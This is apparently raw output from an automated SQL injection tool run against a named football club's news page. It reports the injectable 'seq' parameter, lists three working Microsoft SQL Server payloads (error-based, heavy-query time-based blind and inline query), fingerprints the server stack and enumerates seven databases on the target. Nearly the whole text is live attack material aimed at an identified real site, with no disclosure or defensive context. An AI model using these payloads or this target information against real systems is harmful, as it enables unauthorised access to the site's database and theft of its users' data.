http://www.hyundai-motorsfc.com/news/motors_board_view.asp?seq=57216&page=1
Parameter: seq (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: seq=57216 AND 8221=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8221=8221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(118)+CHAR(113)))&page=1

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: seq=57216 AND 1518=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&page=1

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: seq=(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(118)+CHAR(113))&page=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] master
[*] model
[*] motorsfc
[*] motorsfc_2013
[*] msdb
[*] sms
[*] tempdb